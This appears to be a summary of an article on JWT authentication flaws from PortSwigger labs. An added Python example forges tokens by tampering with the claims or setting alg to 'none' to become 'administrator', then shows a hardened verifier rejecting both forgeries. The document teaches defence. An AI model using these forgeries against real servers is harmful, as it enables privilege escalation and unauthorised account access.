Summary
- JWTs (JSON Web Tokens) are used for stateless authentication and consist of three base64url-encoded parts separated by dots: the header, the payload and the signature.
- Several flaws in how servers handle JWTs can be exploited by attackers, including skipping signature verification and accepting weak or flawed algorithms.
- Defences are needed against every JWT authentication weakness, including unverified signatures and flawed verification logic.
- These flaws can let an attacker elevate privileges or perform actions they are not authorised to perform.
- Two such flaws are worked through in this article, using labs from cybersecurity firm PortSwigger.
- Firstly, when the server never verifies the signature, an attacker can edit the JWT's payload claims to elevate privileges while leaving the original (now invalid) signature in place.
- Secondly, by setting the header's alg to "none" and sending an empty signature, the signature is ignored entirely, giving admin rights and the ability to delete other users.
- These flaws are fixed by always verifying the JWT signature and rejecting alg: none tokens, instead pinning the server to a strong algorithm it expects.
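The two forgeries above and the hardened check that defeats both, as an added example written for this summary rather than code from the article or from PortSwigger. It uses only the Python standard library; the secret key, the claim values and the demo-app issuer are constructed placeholders, not values from the labs.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo key; a real server would use a random, secret key (assumption).
SERVER_SECRET = b"demo-secret-not-for-production"


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as JWT (RFC 7515) requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; restores the padding the encoder stripped."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _enc_json(obj: dict) -> str:
    """Compact JSON, then base64url, for one JWT segment."""
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def issue_hs256(payload: dict, secret: bytes) -> str:
    """What the server does at login: header.payload.HMAC-SHA256(header.payload)."""
    signing_input = _enc_json({"alg": "HS256", "typ": "JWT"}) + "." + _enc_json(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def forge_tampered_payload(token: str, **claims) -> str:
    """First flaw: rewrite claims but keep the original, now-invalid signature.
    Only works against a server that never checks the signature."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    payload = json.loads(b64url_decode(payload_b64))
    payload.update(claims)
    return header_b64 + "." + _enc_json(payload) + "." + sig_b64


def forge_alg_none(token: str, **claims) -> str:
    """Second flaw: declare alg "none" and send an empty signature (trailing dot kept)."""
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    header["alg"] = "none"
    payload = json.loads(b64url_decode(payload_b64))
    payload.update(claims)
    return _enc_json(header) + "." + _enc_json(payload) + "."


def decode_unverified(token: str) -> dict:
    """Vulnerable server logic: trusts whatever the payload says."""
    return json.loads(b64url_decode(token.split(".")[1]))


def decode_verified(token: str, secret: bytes, allowed_algs=("HS256",)) -> dict:
    """Hardened server logic: pin the algorithm (so "none" is rejected before any
    crypto runs) and check the HMAC over header.payload before believing a claim."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") not in allowed_algs:
        raise ValueError("algorithm %r not allowed" % header.get("alg"))
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    # Constant-time compare; an empty or edited signature fails here.
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("signature verification failed")
    return json.loads(b64url_decode(payload_b64))


def accepted_subject(token: str, secret: bytes):
    """Return the verified 'sub' claim, or None if the hardened check rejects the token."""
    try:
        return decode_verified(token, secret)["sub"]
    except ValueError:
        return None


if __name__ == "__main__":
    # Constructed session token for a low-privilege user.
    session = issue_hs256({"sub": "wiener", "iss": "demo-app"}, SERVER_SECRET)
    forgeries = [
        ("tampered payload", forge_tampered_payload(session, sub="administrator")),
        ("alg none", forge_alg_none(session, sub="administrator")),
    ]
    for name, tok in forgeries:
        print(f"{name}: unverified server sees sub={decode_unverified(tok)['sub']!r}, "
              f"verified server accepts sub={accepted_subject(tok, SERVER_SECRET)!r}")
```

The algorithm allow-list is checked before the signature, which is the point of the fix: a server that lets the token's own header choose the algorithm can be talked into "none", whereas one that pins the expected algorithm never reaches the signature step for such a token. Real deployments should use a maintained JWT library configured the same way (explicit algorithms, verification always on) rather than hand-rolled parsing.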
By Aditya Bhatt